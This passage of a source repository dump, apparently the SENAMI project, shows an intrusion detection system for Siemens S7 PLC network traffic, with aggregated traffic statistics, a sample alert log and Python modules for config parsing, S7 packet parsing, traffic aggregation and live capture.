1425 | Other,63,50,192.168.2.201,192.168.2.101
1426 | Other,63,50,172.16.0.199,192.168.2.101
1427 | Other,16,50,172.16.0.200,192.168.2.101
1428 |
1429 | Read,61,50,192.168.2.201,192.168.2.101
1430 | Read,132,50,172.16.0.199,192.168.2.101
1431 |
1432 | Other,61,50,172.16.0.199,192.168.2.101
1433 | Other,61,50,192.168.2.201,192.168.2.101
1434 | Other,4,50,172.16.0.200,192.168.2.101
1435 |
1436 | Read,133,55,192.168.2.101,172.16.0.199
1437 | Read,60,55,192.168.2.201,192.168.2.101
1438 |
1439 | Other,62,55,172.16.0.199,192.168.2.101
1440 | Other,61,55,192.168.2.201,192.168.2.101
1441 |
1442 | Read,133,55,172.16.0.199,192.168.2.101
1443 | Read,60,55,192.168.2.201,192.168.2.101
1444 |
1445 | Other,61,55,172.16.0.199,192.168.2.101
1446 | Other,63,55,192.168.2.201,192.168.2.101
1447 |
1448 | Read,133,55,172.16.0.199,192.168.2.101
1449 | Read,58,55,192.168.2.201,192.168.2.101
1450 |
1451 | Other,61,55,172.16.0.199,192.168.2.101
1452 | Other,59,55,192.168.2.201,192.168.2.101
1453 |
1454 | Read,61,55,192.168.2.201,192.168.2.101
1455 | Read,132,55,172.16.0.199,192.168.2.101
1456 |
1457 | Other,62,55,172.16.0.199,192.168.2.101
1458 | Other,60,55,192.168.2.201,192.168.2.101
1459 |
1460 | Read,133,55,172.16.0.199,192.168.2.101
1461 | Read,60,55,192.168.2.201,192.168.2.101
1462 |
1463 | Other,61,55,172.16.0.199,192.168.2.101
1464 | Other,62,55,192.168.2.201,192.168.2.101
1465 |
1466 | Read,133,55,172.16.0.199,192.168.2.101
1467 | Read,60,55,192.168.2.201,192.168.2.101
1468 |
1469 | Other,63,55,172.16.0.199,192.168.2.101
1470 | Other,62,55,192.168.2.201,192.168.2.101
1471 |
1472 | Read,133,55,172.16.0.199,192.168.2.101
1473 | Read,60,55,192.168.2.201,192.168.2.101
1474 | Read,12,55,192.168.2.7,192.168.2.101
1475 |
1476 | Other,61,55,172.16.0.199,192.168.2.101
1477 | Other,60,55,192.168.2.201,192.168.2.101
1478 | Other,15,55,192.168.2.7,192.168.2.101
1479 |
1480 | Read,133,55,172.16.0.199,192.168.2.101
1481 | Read,58,55,192.168.2.201,192.168.2.101
1482 |
1483 | Other,63,55,192.168.2.201,192.168.2.101
1484 | Other,60,55,172.16.0.199,192.168.2.101
1485 |
1486 | Read,61,55,192.168.2.201,192.168.2.101
1487 | Read,132,55,172.16.0.199,192.168.2.101
1488 |
1489 | Other,64,55,192.168.2.201,192.168.2.101
1490 | Other,60,55,172.16.0.199,192.168.2.101
1491 | Other,16,55,172.16.0.200,192.168.2.101
1492 |
1493 | Read,133,55,172.16.0.199,192.168.2.101
1494 | Read,60,55,192.168.2.201,192.168.2.101
1495 |
1496 | Other,5,55,172.16.0.200,192.168.2.101
1497 | Other,61,55,192.168.2.201,192.168.2.101
1498 | Other,61,55,172.16.0.199,192.168.2.101
1499 |
1500 | Read,133,60,172.16.0.199,192.168.2.101
1501 | Read,60,60,192.168.2.201,192.168.2.101
1502 |
1503 | Other,61,60,172.16.0.199,192.168.2.101
1504 | Other,63,60,192.168.2.201,192.168.2.101
1505 |
1506 | Read,133,60,172.16.0.199,192.168.2.101
1507 | Read,59,60,192.168.2.201,192.168.2.101
1508 |
1509 | Other,61,60,172.16.0.199,192.168.2.101
1510 | Other,60,60,192.168.2.101,192.168.2.201
1511 |
1512 | Read,60,60,192.168.2.101,192.168.2.201
1513 | Read,132,60,172.16.0.199,192.168.2.101
1514 |
1515 | Other,63,60,192.168.2.201,192.168.2.101
1516 | Other,60,60,172.16.0.199,192.168.2.101
1517 |
1518 | Read,133,60,172.16.0.199,192.168.2.101
1519 | Read,60,60,192.168.2.201,192.168.2.101
1520 |
1521 | Other,63,60,192.168.2.201,192.168.2.101
1522 | Other,64,60,172.16.0.199,192.168.2.101
1523 |
1524 | Read,133,0,172.16.0.199,192.168.2.101
1525 | Read,60,0,192.168.2.201,192.168.2.101
1526 |
1527 | Other,63,0,192.168.2.201,192.168.2.101
1528 | Other,70,0,172.16.0.199,192.168.2.101
1529 |
1530 | Read,133,0,172.16.0.199,192.168.2.101
1531 | Read,60,0,192.168.2.201,192.168.2.101
1532 |
1533 | Other,76,0,172.16.0.199,192.168.2.101
1534 | Other,61,0,192.168.2.201,192.168.2.101
1535 |
1536 | Read,133,0,172.16.0.199,192.168.2.101
1537 | Read,60,0,192.168.2.201,192.168.2.101
1538 |
1539 | Other,77,0,172.16.0.199,192.168.2.101
1540 | Other,62,0,192.168.2.201,192.168.2.101
1541 |
1542 | Read,133,0,172.16.0.199,192.168.2.101
1543 | Read,58,0,192.168.2.201,192.168.2.101
1544 |
1545 | Other,61,0,192.168.2.101,192.168.2.201
1546 | Other,77,0,172.16.0.199,192.168.2.101
1547 |
1548 | Read,61,0,192.168.2.201,192.168.2.101
1549 | Read,132,0,172.16.0.199,192.168.2.101
1550 |
1551 | Other,64,0,192.168.2.201,192.168.2.101
1552 | Other,76,0,172.16.0.199,192.168.2.101
1553 | Other,16,0,172.16.0.200,192.168.2.101
1554 |
1555 |
--------------------------------------------------------------------------------
/Example-Files/my_logs.txt:
--------------------------------------------------------------------------------
1 | 09 Jul 2016 14:36:28: [Critical Alert] Value tampering detected, src: 192.168.0.12, dst: 192.168.0.101
2 |
3 | 09 Jul 2016 14:36:33: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
4 |
5 | 09 Jul 2016 14:36:38: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
6 |
7 | 09 Jul 2016 14:36:40: [Medium Alert] High Quantity - 137 x Write packets, src: 192.168.0.12, dst: 192.168.0.101, time interval: 35
8 | --> Unusual time for this activity
9 |
10 | 09 Jul 2016 14:40:29: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
11 |
12 | 09 Jul 2016 14:40:34: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
13 |
14 | 09 Jul 2016 14:40:39: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
15 |
16 | 09 Jul 2016 14:40:42: [Medium Alert] High Quantity - 171 x Write packets, src: 192.168.0.12, dst: 192.168.0.101, time interval: 40
17 | --> Unusual time for this activity
18 |
19 | 09 Jul 2016 14:40:44: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
20 |
21 | 09 Jul 2016 14:41:12: [Medium Alert] High Quantity - 25 x Write packets, src: 192.168.0.101, dst: 192.168.0.12, time interval: 40
22 | --> Unusual time for this activity
23 |
24 | 09 Jul 2016 14:46:51: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
25 |
26 | 09 Jul 2016 14:46:56: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
27 |
28 | 09 Jul 2016 14:47:01: [Critical Alert] Value tampering detected, src: 192.168.0.100, dst: 192.168.0.101
29 |
30 | 09 Jul 2016 14:47:16: [Medium Alert] High Quantity - 184 x Write packets, src: 192.168.0.12, dst: 192.168.0.101, time interval: 45
31 | --> Unusual time for this activity
32 |
33 | 09 Jul 2016 15:54:39: [Medium Alert] High Quantity - 5 x Write packets, src: 192.168.0.12, dst: 192.168.0.101, time interval: 55
34 | --> Unusual time for this activity
35 |
36 |
--------------------------------------------------------------------------------
/Experiment Setup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WilliamJardine/SENAMI/32f571d5b16eebf36738469c9fdd84b600b4e648/Experiment Setup.png
--------------------------------------------------------------------------------
/IDS/Config.py:
--------------------------------------------------------------------------------
1 | """
2 | File: Config.py
3 | Reads in the IDS_CONFIG file, including PLC IP and passive heuristics.
4 | Also provides an API for pulling out config info by function code and other info.
5 | """
6 | __author__ = 'William Jardine'
7 |
8 | import sys, os
9 |
10 | # want multiple classes in here: read, write, upload, etc...
11 | # where each has min, max values and a list of IPs (and times)
12 |
13 | class Packet_Details:
14 | def __init__(self, function_code):
15 | self.function_code = function_code
16 |
17 | def parse_vals(self, vals):
18 | self.min = int(vals.rsplit('/')[0])
19 | self.max = int(vals.rsplit('/')[1])
20 |
21 | def parse_IPs(self, IPs):
22 | self.list_of_IPs = []
23 | for ip in IPs.rsplit(';'):
24 | self.list_of_IPs.append(ip)
25 |
26 | def parse_times(self, times):
27 | self.list_of_times = []
28 | for time in times.rsplit(','):
29 | self.list_of_times.append(int(time))
30 |
31 | class Config_File:
32 | def __init__(self):
33 | self.f = open('IDS_CONFIG.txt', 'r')
34 |
35 | def parse_config(self):
36 | levels = []
37 | IPs = []
38 | times = []
39 | self.packet_details = {'Read': Packet_Details('Read'), 'Write': Packet_Details('Write'), 'StartUpload': Packet_Details('StartUpload'),
40 | 'Upload': Packet_Details('Upload'), 'EndUpload': Packet_Details('EndUpload'), 'Other': Packet_Details('Other')}
41 |
42 | full_line = self.f.readline().rstrip()
43 | if full_line.rsplit(':')[0] != "IDS_CONFIG":
44 | print "Invalid IDS config file!"
45 | sys.exit(0)
46 | self.PLC_IP = full_line.rsplit(':')[1]
47 |
48 | i = 0
49 | for line in self.f:
50 | if line[0] == '>':
51 | i = i+1
52 | continue
53 | elif line.rstrip() == '':
54 | continue
55 | if i == 1:
56 | levels.append(line.rstrip())
57 | elif i == 2:
58 | IPs.append(line.rstrip())
59 | elif i == 3:
60 | times.append(line.rstrip())
61 |
62 | for entry in levels:
63 | code = entry.rsplit(':')[0]
64 | vals = entry.rsplit(':')[1]
65 | self.packet_details[code].parse_vals(vals)
66 | for entry in IPs:
67 | code = entry.rsplit(':')[0]
68 | IP_part = entry.rsplit(':')[1]
69 | self.packet_details[code].parse_IPs(IP_part)
70 | for entry in times:
71 | code = entry.rsplit(':')[0]
72 | time_part = entry.rsplit(':')[1]
73 | self.packet_details[code].parse_times(time_part)
74 | #if len(times) == 0:
75 | # print "NONE"
76 | #else:
77 | # for entry in times:
78 | # print entry
79 |
80 | def packet_type_info(self, function_code_name):
81 | return self.packet_details[function_code_name]
82 |
--------------------------------------------------------------------------------
/IDS/S7Packet.py:
--------------------------------------------------------------------------------
1 | """
2 | File: S7Packet.py
3 | Class to represent an S7 packet. Parses S7 (0x32 protocol version) packets and stores their information.
4 | This parses S7 packets with ROSCTR codes 1, 2, 3 and 7, and function codes 4, 5, 0xf0, 0x1d, 0x1e and 0x1f.
5 | """
6 | __author__ = 'William Jardine'
7 |
8 | from struct import *
9 | import time
10 |
11 | class S7Packet:
12 | """
13 | Class representing and parsing all S7 packet information
14 | """
15 | def __init__(self, packet=''):
16 | self.s7_packet = packet
17 |
18 | def check_magic(self):
19 | return self.s7_packet[0]
20 |
21 | def parse(self):
22 | ctr = 0
23 | self.ROSCTR_val = ord(self.s7_packet[1])
24 | # ROSCTR value can be 1, 2, 3, 7 or 8 (8 is not currently supported by this program)
25 | if self.ROSCTR_val == 1 or self.ROSCTR_val == 7: # Job / Userdata
26 | self.s7_header_bytes = self.s7_packet[0:10]
27 | ctr = ctr + 10
28 | self.s7_header = unpack('!BBHHHH', self.s7_header_bytes)
29 | elif self.ROSCTR_val == 2 or self.ROSCTR_val == 3: # Ack / Ack_data
30 | self.s7_header_bytes = self.s7_packet[0:12] # as ROSCTR==2 and ==3 have 2 error bytes
31 | ctr = ctr + 12
32 | self.s7_header = unpack('!BBHHHHH', self.s7_header_bytes)
33 | self.s7_header_bytes = self.s7_packet[0:12] # as ROSCTR==2 and ==3 have 2 error bytes
34 |
35 | if self.s7_header[4] > 0: # only do this if we have some parameters!
36 | self.s7_param_bytes = self.s7_packet[ctr:ctr+self.s7_header[4]] # reads in param_length worth of bytes
37 | ctr = ctr + self.s7_header[4]
38 | if self.ROSCTR_val == 1 or self.ROSCTR_val == 2 or self.ROSCTR_val == 3:
39 | self.function_code = int(self.s7_param_bytes[0].encode("hex"),16)
40 | if self.s7_header[4] > 1: # if there's more here than just the function code (i.e. not a End Upload Ack_Data packet)
41 | self.item_count = int(self.s7_param_bytes[1].encode("hex"),16)
42 | self.param_size = int(self.s7_header[4])-2
43 | if self.s7_header[5] > 0:
44 | self.s7_PDU_bytes = self.s7_packet[ctr:ctr+self.s7_header[5]]
45 | ctr = ctr + self.s7_header[5]
46 |
47 | if hasattr(self,'item_count') and self.item_count > 0:
48 | self.item_size = int(self.param_size/self.item_count)
49 | if self.s7_header[4] > 2: # s7_header[4] is param_length and [5] is data_length
50 | if self.ROSCTR_val == 7: # Userdata packets have extended parameter sections and different PDUs
51 | self.param_type = int(ord(self.s7_param_bytes[5])) >> 4 # Get the first 4 bits of this number
52 | if self.param_type == 4: # Request type
53 | size_left = int(ord(self.s7_param_bytes[3])) - 4
54 | fmt_string = '!3sBBBBB'
55 | if size_left > 0:
56 | fmt_string = '!3sBBBBB{}s'.format(size_left)
57 | self.param_details = unpack(fmt_string, self.s7_param_bytes)
58 | else: # else == 8: Response type
59 | self.param_details = unpack('!3sBBBBBBBH', self.s7_param_bytes)
60 | self.param_head = self.param_details[0]
61 | self.sqn_number = self.param_details[5]
62 | self.item_count = 1
63 | elif self.ROSCTR_val == 1 or self.ROSCTR_val == 2 or self.ROSCTR_val == 3:
64 | current = 2
65 | self.items = []
66 | for i in range(0, self.item_count):
67 | self.items.append(unpack('!BBBBHHB3s', self.s7_param_bytes[current:current+self.item_size])) # 3s denotes a single 3-byte string
68 | current = current + self.item_size
69 | elif self.s7_header[5] > 1: # if data_length > 1
70 | self.item_header = []
71 | self.item_contents = []
72 | current = 0
73 |
74 | if self.function_code != 29 and self.function_code != 30 and self.function_code != 31: # upload functions don't have data items
75 | for i in range(0, self.item_count):
76 | self.item_header.append(unpack('!BBH', self.s7_PDU_bytes[current:current+4]))
77 | current = current + 4 # add on length of header
78 | if self.item_header[i][2] == 32: # for some reason data length 4 is coded as 0x32...
79 | lst = list(self.item_header[i])
80 | lst[2] = 4
81 | self.item_header[i] = tuple(lst)
82 |
83 | item_length = self.item_header[i][2]
84 | # if item data length == 1 and item count == 1, data length will be 8, but means 1...
85 | if self.s7_header[5] == 5 and self.item_count == 1:
86 | item_length = 1
87 | item_data_fmt_string = '!{}s'.format(item_length)
88 | self.item_contents.append(unpack(item_data_fmt_string, self.s7_PDU_bytes[current:current+item_length]))
89 | current = current + item_length # add on length of data
90 | if item_length == 1:
91 | current = current + 1 # skip fill byte
92 | if self.s7_header[5] == 0: # if data_length == 0 -- i.e. we want to look at the item addresses
93 | # upload functions don't have data items and Ack packets are just headers
94 | if self.ROSCTR_val != 2 and (self.function_code != 29 and self.function_code != 30 and self.function_code != 31):
95 | self.item_address = []
96 | for i in range(0, self.item_count):
97 | self.item_address.append(int(self.items[i][7].encode("hex"),16))
98 |
99 | def print_details(self):
100 | # print all packet info
101 | print
102 | print("Length of S7 packet: {}".format(len(self.s7_packet)))
103 | print
104 | print("s7 header : {}".format(self.s7_header_bytes.encode("hex"))) # print hex of s7_header_bytes
105 | print(" magic number : {}".format(hex(self.s7_header[0])))
106 | if self.ROSCTR_val == 1 or self.ROSCTR_val == 3:
107 | if self.function_code == 4:
108 | print(" function code : 4 (Read Var)")
109 | elif self.function_code == 5:
110 | print(" function code : 5 (Write Var)")
111 | elif self.function_code == 240: # 240 for some reason...
112 | print(" function code : 0xf0 (Setup Communication)")
113 | elif self.function_code == 29:
114 | print(" function code : 0x1d (Start Upload)")
115 | elif self.function_code == 30:
116 | print(" function code : 0x1e (Upload)")
117 | elif self.function_code == 31:
118 | print(" function code : 0x1f (End Upload)")
119 | if self.ROSCTR_val == 1:
120 | print(" packet type : Request (Job)")
121 | elif self.ROSCTR_val == 2:
122 | print(" packet type : Ack")
123 | elif self.ROSCTR_val == 3:
124 | print(" packet type : Response (ACK_Data)")
125 | elif self.ROSCTR_val == 7:
126 | print(" packet type : Userdata")
127 | if self.s7_header[4] > 0: # only do this if we have some parameters!
128 | print("s7 parameter area : {}".format(self.s7_param_bytes.encode("hex")))
129 | if self.ROSCTR_val == 1 or self.ROSCTR_val == 2 or self.ROSCTR_val == 3:
130 | if hasattr(self,'items'):
131 | for index, item in enumerate(self.items):
132 | print(" item {} address : {}".format(index+1, item[7].encode("hex")))
133 | elif self.ROSCTR_val == 7:
134 | print(" Parameter head : {}".format(self.param_head.encode("hex")))
135 | print(" Sequence number : {}".format(self.sqn_number))
136 | if self.s7_header[5] > 0:
137 | print("s7 PDU : {}".format(self.s7_PDU_bytes.encode("hex")))
138 | if hasattr(self,'item_contents'):
139 | for index, item in enumerate(self.item_contents):
140 | print(" item {} data : {}".format(index+1, item[0].encode("hex")))
141 | else:
142 | print("s7 PDU : None")
143 |
--------------------------------------------------------------------------------
/IDS/aggregate_traffic.py:
--------------------------------------------------------------------------------
1 | """
2 | File: aggregate_traffic.py
3 | Iterates over a given traffic capture (pcap file) and sorts info by function code, quantity, time, IPs, etc.
4 | This outputs lots of ordered information which can be used to craft the IDS_CONFIG file.
5 | """
6 | __author__ = 'William Jardine'
7 |
8 | from datetime import datetime
9 | from collections import OrderedDict
10 | import dpkt, socket, struct, sys, S7Packet
11 | from time import sleep
12 |
13 | """
14 | main functionality
15 | """
16 |
17 | if(len(sys.argv)>1):
18 | f = open(sys.argv[1], 'r')
19 | else:
20 | print("Please enter the .pcap file to parse!")
21 | sys.exit(0)
22 | pcap = dpkt.pcap.Reader(f)
23 |
24 | """
25 | pcap = pcap.pcap()
26 | capture_interface = 'eth0'
27 | pcap = pcap.pcap(name=capture_interface)
28 | """
29 |
30 | PLC_ADDRESS = '192.168.2.101'
31 |
32 | f_out = open('config_file_information.txt', 'w')
33 |
34 | f_out.write('TITLE: config_file_information\n\n')
35 |
36 | f_out.write("ATTRIBUTE: functionCode\n")
37 | f_out.write("ATTRIBUTE: packetsPerThirtySecsOfThisType\n")
38 | f_out.write("ATTRIBUTE: 5MinuteTimeInterval\n")
39 | f_out.write("ATTRIBUTE: srcIP\n")
40 | f_out.write("ATTRIBUTE: dstIP\n\n")
41 |
42 | ctr = 1
43 | # count_by_func_code dict in format: Function Code, [list_of_values, list_of_src_IPs, list_of_dst_IPs, list_of_timestamps]
44 | count_by_func_code = OrderedDict((('Read', [[], [], [], []]), ('Write', [[], [], [], []]),
45 | ('StartUpload', [[], [], [], []]), ('Upload', [[], [], [], []]), ('EndUpload', [[], [], [], []])))
46 | other_count = [[], [], [], []]
47 | #exception_ctr = 0
48 | for timestamp, packet in pcap:
49 | time_dt = datetime.fromtimestamp(timestamp)
50 | time = datetime.fromtimestamp(timestamp).strftime('%M')
51 | int_time = int(time) # converts the timestamp to an int representation of hours and minutes
52 | if not 'last_packet' in locals(): # if this is the 1st iteration
53 | last_packet = time_dt
54 | #print("packet {} : {}".format(ctr, time))
55 | ctr = ctr + 1
56 |
57 | eth = dpkt.ethernet.Ethernet(packet)
58 | packet = eth.pack()
59 | ip = eth.data
60 | ipSrc = ""
61 | ipDst = ""
62 | #print "packet {} length is {}".format(ctr, len(packet))
63 | try:
64 | if hasattr(ip,'dst') and len(ip.dst) > 0:
65 | ipDst = socket.inet_ntoa(ip.dst) # convert to human-readable IP addresses
66 | ipSrc = socket.inet_ntoa(ip.src)
67 | #print("sent from {} to {}".format(ipSrc, ipDst))
68 | except:
69 | #print "ruh roh --> packet: {}".format(ctr)
70 | #exception_ctr += 1
71 | # couldn't parse this packet
72 | continue
73 |
74 | if len(eth) > 62 and packet[61] == '2': # if the magic number is what it should be for an s7 packet
75 | if ipSrc == PLC_ADDRESS or ipDst == PLC_ADDRESS: # ignores traffic from PLCs we're not monitoring
76 | try:
77 | s7p = S7Packet.S7Packet(packet[61:]) # s7 packet from 61st byte to the end
78 | s7p.parse()
79 | #s7p.print_details()
80 | except:
81 | continue
82 |
83 | if hasattr(s7p,'function_code'):
84 | function = ''
85 | if s7p.function_code == 4:
86 | function = 'Read'
87 | elif s7p.function_code == 5:
88 | function = 'Write'
89 | elif s7p.function_code == 29:
90 | function = 'StartUpload'
91 | elif s7p.function_code == 30:
92 | function = 'Upload'
93 | elif s7p.function_code == 31:
94 | function = 'EndUpload'
95 | else:
96 | function = 'NotSupported'
97 |
98 | if function != 'NotSupported':
99 | if len(count_by_func_code[function][1]) == 0: # if the lists are empty
100 | count_by_func_code[function] = ([1], [ipSrc], [ipDst], [int_time])
101 |
102 | no_entry = True
103 | for i in range(len(count_by_func_code[function][0])): # find the entry for this function/IP mapping, if one exists
104 | if (count_by_func_code[function][1][i] == ipSrc and count_by_func_code[function][2][i] == ipDst) or \
105 | (count_by_func_code[function][1][i] == ipDst and count_by_func_code[function][2][i] == ipSrc):
106 | for j in range(len(count_by_func_code[function][0])): # update the entry for this function/IP mapping
107 | if j == i:
108 | no_entry = False
109 | count_by_func_code[function][0][j] = count_by_func_code[function][0][j] + 1
110 | count_by_func_code[function][3][j] = int_time
111 | if no_entry: # if we've found no entry for this function/IP mapping
112 | count_by_func_code[function][0].append(1)
113 | count_by_func_code[function][1].append(ipSrc)
114 | count_by_func_code[function][2].append(ipDst)
115 | count_by_func_code[function][3].append(int_time)
116 | count_by_func_code[function] = (count_by_func_code[function][0], count_by_func_code[function][1],
117 | count_by_func_code[function][2], count_by_func_code[function][3])
118 | else:
119 | if ipSrc == PLC_ADDRESS or ipDst == PLC_ADDRESS: # ignores traffic from PLCs we're not monitoring
120 | # other packets
121 | if len(other_count[1]) == 0: # if the lists are empty
122 | other_count = ([1], [ipSrc], [ipDst], [int_time])
123 |
124 | no_entry = True
125 | for i in range(len(other_count[0])): # find the entry for this function/IP mapping, if one exists
126 | if (other_count[1][i] == ipSrc and other_count[2][i] == ipDst) or \
127 | (other_count[1][i] == ipDst and other_count[2][i] == ipSrc):
128 | for j in range(len(other_count[0])): # update the entry for this function/IP mapping
129 | if j == i:
130 | no_entry = False
131 | other_count[0][j] = other_count[0][j] + 1
132 | other_count[3][j] = int_time
133 | if no_entry: # if we've found no entry for this function/IP mapping
134 | other_count[0].append(1)
135 | other_count[1].append(ipSrc)
136 | other_count[2].append(ipDst)
137 | other_count[3].append(int_time)
138 | other_count = (other_count[0], other_count[1], other_count[2], other_count[3])
139 |
140 | difference = time_dt - last_packet
141 | seconds_difference = (difference).total_seconds()
142 | if seconds_difference >= 30:
143 | #print count_by_func_code
144 | for key,value_list in count_by_func_code.items():
145 | values = value_list[0]
146 | for i in range(len(values)):
147 | value = values[i]
148 | time_interval = int(5 * round(float(int(value_list[3][i]) % 60)/5))
149 | if len(value_list[1]) > 0:
150 | output_string = "{},{},{},{},{}\n".format(key, value, time_interval, value_list[1][i], value_list[2][i])
151 | else:
152 | output_string = "{},{},{}\n".format(key, value, time_interval)
153 | if value != 0:
154 | f_out.write(output_string)
155 | f_out.write('\n')
156 |
157 | for i in range(len(other_count[0])):
158 | value = other_count[0][i]
159 | time_interval = int(5 * round(float(int(other_count[3][i]) % 60)/5))
160 | if len(other_count[1]) > 0:
161 | output_string = "Other,{},{},{},{}\n".format(value, time_interval, other_count[1][i], other_count[2][i])
162 | else:
163 | output_string = "Other,{},{}\n".format(value, time_interval)
164 | if value != 0:
165 | f_out.write(output_string)
166 | f_out.write('\n')
167 |
168 | last_packet = time_dt
169 | count_by_func_code = OrderedDict((('Read', [[], [], [], []]), ('Write', [[], [], [], []]),
170 | ('StartUpload', [[], [], [], []]), ('Upload', [[], [], [], []]), ('EndUpload', [[], [], [], []])))
171 | other_count = [[], [], [], []]
172 | f.close()
173 | f_out.close()
174 |
--------------------------------------------------------------------------------
/IDS/ids.py:
--------------------------------------------------------------------------------
1 | """
2 | File: ids.py
3 | Script to capture and parse S7 network packets and generate alerts
4 | Also actively polls the PLC for certain variables if active mode is enabled
5 | """
6 | __author__ = 'William Jardine'
7 |
8 | from datetime import datetime
9 | from collections import OrderedDict
10 | import dpkt, pcap, socket, struct, S7Packet, Config, sys, os
11 | import snap7
12 |
13 | """
14 | Read in config details and values from IDS_CONFIG.txt
15 | """
16 | config = Config.Config_File()
17 | config.parse_config()
18 | PLC_ADDRESS = config.PLC_IP
19 | print "monitoring traffic to and from the PLC at {}".format(PLC_ADDRESS)
20 | rack = 0
21 | slot = 2
22 |
23 | read_packet = config.packet_type_info('Read')
24 | write_packet = config.packet_type_info('Write')
25 | start_upload_packet = config.packet_type_info('StartUpload')
26 | upload_packet = config.packet_type_info('Upload')
27 | end_upload_packet = config.packet_type_info('EndUpload')
28 | other_packets = config.packet_type_info('Other')
29 | packet_details = {'Read': read_packet, 'Write': write_packet, 'StartUpload': start_upload_packet, 'Upload': upload_packet,
30 | 'EndUpload': end_upload_packet}
31 | """
32 | main functionality
33 | """
34 |
35 | how_many_args = 1
36 |
37 | """ uncomment the below and comment out the capture_interface bits to check a pcap file instead
38 | if len(sys.argv) > 1:
39 | how_many_args += 1
40 | f = open(sys.argv[1], 'r')
41 | else:
42 | print("Please enter the .pcap file to parse!")
43 | sys.exit(0)
44 | pc = dpkt.pcap.Reader(f)
45 | """
46 |
47 | if os.path.isfile('my_logs.txt'):
48 | f_out = open('my_logs.txt', 'a+')
49 | else:
50 | f_out = open('my_logs.txt', 'w+')
51 |
52 | capture_interface_0 = 'eth0'
53 | capture_interface_1 = 'eth1'
54 | pc_0 = pcap.pcap(name=capture_interface_0)
55 | pc_1 = pcap.pcap(name=capture_interface_1)
56 | active = False
57 |
58 | if len(sys.argv) > 1 and sys.argv[1] == "-active":
59 | active = True
60 | print "active mode enabled\n"
61 | client = snap7.client.Client()
62 | client.connect(PLC_ADDRESS, rack, slot)
63 | else:
64 | print "running in passive mode\n"
65 |
66 | ctr = 1
67 |
68 | # [count], [ipSrc], [ipDst], [time]
69 | count_by_func_code = OrderedDict((('Read', [[], [], [], []]), ('Write', [[], [], [], []]),
70 | ('StartUpload', [[], [], [], []]), ('Upload', [[], [], [], []]), ('EndUpload', [[], [], [], []])))
71 | other_count = [[], [], [], []]
72 |
73 | passive_possible_alert_count = 0
74 | active_possible_alert_count = 0
75 | command = ""
76 | try:
77 | while True:
78 | timestamp = []
79 | packet = []
80 | timestamp_0, packet_0 = pc_0.next()
81 | timestamp_1, packet_1 = pc_1.next()
82 | timestamp.append(timestamp_0)
83 | timestamp.append(timestamp_1)
84 | packet.append(packet_0)
85 | packet.append(packet_1)
86 |
87 | for i in range(len(timestamp)):
88 | if ctr > 1: # reopens the file handler after flushing contents to file at the end of the loop
89 | f_out = open('my_logs.txt', 'a+')
90 |
91 | time_dt = datetime.fromtimestamp(timestamp[i])
92 | time = datetime.fromtimestamp(timestamp[i]).strftime('%d %b %Y %H:%M:%S')
93 | time_mins = datetime.fromtimestamp(timestamp[i]).strftime('%M')
94 | int_time_mins = int(time_mins)
95 | if not 'last_packet' in locals(): # if this is the 1st iteration
96 | last_packet = time_dt
97 | interval_timer = time_dt
98 | #print("packet {} : {}".format(ctr, time))
99 |
100 | eth = dpkt.ethernet.Ethernet(packet[i])
101 | pack = eth.pack()
102 | ip = eth.data
103 | ipSrc = ""
104 | ipDst = ""
105 | try:
106 | ipDst = socket.inet_ntoa(ip.dst) # convert to human-readable IP addresses
107 | ipSrc = socket.inet_ntoa(ip.src)
108 | except:
109 | # couldn't parse this packet
110 | continue
111 |
112 | if len(eth) > 62 and pack[61] == '2': # if the magic number is what it should be for an s7 packet
113 | if ipSrc == PLC_ADDRESS or ipDst == PLC_ADDRESS: # ignores traffic from PLCs we're not monitoring
114 | try:
115 | s7p = S7Packet.S7Packet(pack[61:]) # s7 packet from 61st byte to the end
116 | s7p.parse()
117 | #s7p.print_details()
118 | except:
119 | continue
120 |
121 | if hasattr(s7p,'function_code'):
122 | function = ''
123 | if s7p.function_code == 4:
124 | function = 'Read'
125 | elif s7p.function_code == 5:
126 | function = 'Write'
127 | elif s7p.function_code == 29:
128 | function = 'StartUpload'
129 | elif s7p.function_code == 30:
130 | function = 'Upload'
131 | elif s7p.function_code == 31:
132 | function = 'EndUpload'
133 | else:
134 | function = 'NotSupported'
135 |
136 | if function != 'NotSupported':
137 | if len(count_by_func_code[function][1]) == 0: # if the lists are empty
138 | count_by_func_code[function] = ([1], [ipSrc], [ipDst], [int_time_mins])
139 |
140 | no_entry = True
141 | for i in range(len(count_by_func_code[function][0])): # find the entry for this function/IP mapping, if one exists
142 | if (count_by_func_code[function][1][i] == ipSrc and count_by_func_code[function][2][i] == ipDst) or \
143 | (count_by_func_code[function][1][i] == ipDst and count_by_func_code[function][2][i] == ipSrc):
144 | for j in range(len(count_by_func_code[function][0])): # update the entry for this function/IP mapping
145 | if j == i:
146 | no_entry = False
147 | count_by_func_code[function][0][j] = count_by_func_code[function][0][j] + 1
148 | count_by_func_code[function][3][j] = int_time_mins
149 | if no_entry: # if we've found no entry for this function/IP mapping
150 | count_by_func_code[function][0].append(1)
151 | count_by_func_code[function][1].append(ipSrc)
152 | count_by_func_code[function][2].append(ipDst)
153 | count_by_func_code[function][3].append(int_time_mins)
154 | count_by_func_code[function] = (count_by_func_code[function][0], count_by_func_code[function][1],
155 | count_by_func_code[function][2], count_by_func_code[function][3])
156 | else:
157 | if ipSrc == PLC_ADDRESS or ipDst == PLC_ADDRESS: # ignores traffic from PLCs we're not monitoring
158 | # other packets
159 | if len(other_count[1]) == 0: # if the lists are empty
160 | other_count = ([1], [ipSrc], [ipDst], [int_time_mins])
161 |
162 | no_entry = True
163 | for i in range(len(other_count[0])): # find the entry for this function/IP mapping, if one exists
164 | if (other_count[1][i] == ipSrc and other_count[2][i] == ipDst) or \
165 | (other_count[1][i] == ipDst and other_count[2][i] == ipSrc):
166 | for j in range(len(other_count[0])): # update the entry for this function/IP mapping
167 | if j == i:
168 | no_entry = False
169 | other_count[0][j] = other_count[0][j] + 1
170 | other_count[3][j] = int_time_mins
